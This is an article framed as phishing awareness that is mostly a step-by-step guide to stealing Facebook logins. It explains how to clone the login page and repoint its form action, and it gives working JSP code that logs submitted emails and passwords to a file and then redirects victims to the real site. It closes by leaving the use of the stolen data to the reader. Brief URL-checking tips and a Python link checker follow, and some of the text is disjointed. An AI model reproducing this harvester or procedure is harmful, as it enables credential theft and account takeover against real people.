Sisay A. Chala
In this article, I will try to show how phishing, a technique that lures users into handing information to an
unintended recipient, is launched and how to defend yourself against such an attack.
A few days ago, I received a Whatsapp message from a friend. As shown in Figure 7, the message (in
German) states that my friend won a voucher worth 250 and that I should also click the given link to get a
voucher of the same worth. That prompted me to share my thoughts. I hope that reading through this article helps
you tell whether a message you receive is genuine or not.
Warning!
At the end of this article, I hope that the reader is able to apply phishing to hack a target user.
However, it is important to note that hacking is a crime! This material is solely aimed at sharing
knowledge for academic purposes, with the intention of informing readers how to defend against
phishing attacks. The author will not bear any direct (or implied) responsibility for damage to you
or to the user you attacked. Try it at your own risk!
I. What is Phishing?
Phishing is the process by which a user is tricked into providing information to attackers. Phishers
use email, telephone or messages to entice, scare or urge a user so that the user gives up personal
details, credit card numbers, usernames and passwords or any other private information. The
commonest phishing attack happens when a user receives an email (or other form of message) that
promises the user something appealing and tricks the user into clicking a link that is claimed to be reputable but that
takes the user to a website controlled by the criminal. For example, the user may be given a link that
the attacker claims is the bank's website, but the link takes the user to another address.
The attackers use techniques called social engineering that exploit a user's ego, fear or greed to trick
the user. They may come in the form of financial promises, travel promises, system update
warnings, etc. In a nutshell, a phishing attack is, in most cases, an attack launched with the help of the victim.
Attackers may also use malicious software embedded in websites, pirated software, images,
etc. that runs on the system without the user's awareness. Such software may capture everything
the user types, take screenshots or even take pictures of the user through the webcam, and transfer this
information to the attacker. It may also force the user's browser to open the phishing site, where
the user will give away private information.
Reports by the Anti-Phishing Working Group show that phishing attacks are growing at an alarming rate
and that in the first quarter of 2016 alone, they grew by 250%.[i]
[i] http://docs.apwg.org/reports/apwg_trends_report_q1_2016.pdf
target user and ways to defend yourself in the likely event of you being a target.
This article helps users increase their security awareness while using the Internet by:
1. helping users understand the risks of clicking a link in relation to phishing attacks,
2. advising users to be cautious of the links they see in messages, emails and other content
they receive before opening them,
3. advising users to be cautious of the web pages they browse and the URLs to which they are
redirected,
4. showing some tricks used by hackers to get around users' caution through URL names
and personalized messages,
5. showing those who aspire to be security professionals how easily phishing can be
performed.
The procedure by which a phishing attack works, shown in Figure 1, is described in the following six
steps:
1) Prepare content that appeals to the user or urges the user to act. See the following example:
Dear Mr. Gullible User,
I have been following your posts on facebook. The points you have been
raising are very interesting.
...
I want to follow your footsteps and write few posts on regular basis. I
have written my first post that I think is interesting for you too. As I
would like to get your insightful advice, can you please spare a little
of your precious time to see my post and give me your feedback?
Click here to get to the post.
Yours sincerely,
Naughty Guy
2) Now prepare the fake web page that looks exactly like the actual web page, Facebook[ii] in
this case. The target user is sent the above message with the link directing the user to this
fake web page, which is controlled by the criminal. The criminal may have written code to
direct the user to the actual web page after capturing what they want. In this case, the user
may not even know what happened in between.
[ii] There is no intention to take Facebook as a target; it is used only as an example because it is used by many users.
To create a fake web page that looks exactly like the actual page, the easy short-cut is to
save the actual page and edit the part of the code that communicates with the server-side
application. In this example, let us save the Facebook front page and edit part of the code.
Now, right-click on the page, click "view page source" in the menu that appears and
search for the text action= in the source to get the following.
This is the part of the code that sends the user name (i.e., email or phone number in the case of
Facebook) and password to the server-side application.
All you need to do to redirect the user's information is to replace the URL
https://www.facebook.com/login.php?login_attempt=1&lwv=110 with your own URL,
which we will create in step 3.
Now, save the modified page on your server (or upload it to a hosting site; but be
careful, most hosting sites do not allow phishing!), put the link to the new file into the
message you created in step 1 and get ready to send it to the victim.
3) Now create the server side application that captures the user inputs from the fake page we
created in step 2, saves the content and redirects the user to the actual Facebook site with
content to verify the password. To do that, you need names of two variables that will hold
the email and password from the web page. In the page source you got in step 2, just near
where you edited the value of action, you will find two input elements for email and
password as name=email and name=pass, respectively. Then use these names in the
server side application code.
Here is example code, a Java Server Page (JSP), for the server-side application that captures the form
inputs.
<%@ page import="java.io.*" %>
<%@ page import="javax.servlet.http.*" %>
<HTML>
<HEAD>
</HEAD>
<BODY>
<H1>This is a Test</H1>
<!-- Here comes some content-->
<BR>
<BR>
<%
// The field names "email" and "pass" come from the form saved in step 2
String email_input = request.getParameter("email");
String pass_input = request.getParameter("pass");
// data.txt is resolved relative to the web application's root and opened in append mode
String file = application.getRealPath("data.txt");
FileWriter filewriter = new FileWriter(file, true);
filewriter.write("<B>Email: </B>" + email_input + "<BR>");
filewriter.write("<B>Password: </B>" + pass_input + "<BR><BR>\n");
filewriter.close();
%>
<!--jsp:include page="test.txt" flush="true"/-->
<%
// Send the user on to the genuine site, as described in step 2
String redirectURL = "http://www.facebook.com";
response.sendRedirect(redirectURL);
%>
</BODY>
</HTML>
4) Upload the files to the web server. Make sure that on your server (or in the folder on the hosting
site[iii]) you have two files: one facing the user (i.e., the Facebook page) that you created in
step 2 and the server-side application that you created in step 3. Now update the
message you created in step 1 so that the link (the one you want the user to click) points to
the fake page you saved.
5) Now you are ready to send the message to the user and launch phishing attack. Send the
message and watch the content of the file that the server side application created.
6) The last step is to use the data collected. Did you want to use the login information to get
access to their accounts? Did you want to publish account information on websites and make
news? :-) That is up to you!
Check URL
In the email that contains the link, attackers try to make sure the message looks
natural. To do this, they first study the target user, i.e., his/her interactions, needs, activities and
connections. You can find examples of such emails on anti-social-engineering websites such as
hoax-slayer[iii]. For example, your Facebook status updates give them a lot of information to create a
personalized message that you (or your friends or relatives) will believe and be fooled by.
[Figure: browser address bar, annotated "Check URL"]
[iii] http://www.hoax-slayer.com/
Figure 7: Whatsapp message offering a voucher worth 250
Because attackers may trick your friends/colleagues to send you the message, it is wise to
use your instinct when you receive messages that have something suspicious irrespective of
whether or not you know (and trust) the sender.
Remember: NO credible company requests you to provide personal information via email.
Most of all, NO company asks you for password!
If you notice any of the above (or anything else that is suspicious), be cautious. The baseline is to
always remember that there is NO FREE MONEY!
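The "Check URL" advice above can be turned into a few mechanical checks on a link before it is clicked. This is an added example, not part of the original article: the KNOWN_BRANDS table and the hosts used are constructed placeholders, and it goes a little beyond the article by also covering the "@" userinfo trick and punycode (xn--) hosts, two of the URL-name tricks the article only refers to in general.

```python
from urllib.parse import urlparse
import ipaddress

# Brands whose name in a hostname is only legitimate on their own domain
# (constructed list; extend it with the brands your users rely on).
KNOWN_BRANDS = {"facebook": "facebook.com", "paypal": "paypal.com"}


def under_domain(host, domain):
    return host == domain or host.endswith("." + domain)


def check_link(href, shown_text=None):
    """Return the reasons a link looks like phishing (empty list if none)."""
    reasons = []
    parts = urlparse(href)
    host = (parts.hostname or "").lower()
    if parts.username is not None:
        # "https://www.facebook.com@evil.example/" really goes to evil.example
        reasons.append(f"userinfo before '@' hides the real host {host}")
    try:
        ipaddress.ip_address(host)
        reasons.append("host is a bare IP address, not a company domain")
    except ValueError:
        pass
    if any(label.startswith("xn--") for label in host.split(".")):
        reasons.append("punycode host, may be a look-alike of a familiar name")
    for brand, domain in KNOWN_BRANDS.items():
        if brand in host and not under_domain(host, domain):
            reasons.append(f"host mentions '{brand}' but is not under {domain}")
    if shown_text and " " not in shown_text.strip():
        # Link text that itself looks like a URL must agree with the real target.
        shown = shown_text.strip()
        if "://" not in shown:
            shown = "http://" + shown
        shown_host = (urlparse(shown).hostname or "").lower()
        if "." in shown_host and shown_host != host:
            reasons.append(f"link text shows {shown_host} but it goes to {host}")
    return reasons
```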
V. Conclusion
This article briefly discusses one of the commonest cyber attacks, the phishing attack, and provides a
step-by-step procedure for how the attack is implemented and executed. The article also highlights
methods used by criminals to lure victims onto unintended websites. It concludes by providing tips
for avoiding these attacks.
Further Reading
http://computer.howstuffworks.com/phishing.htm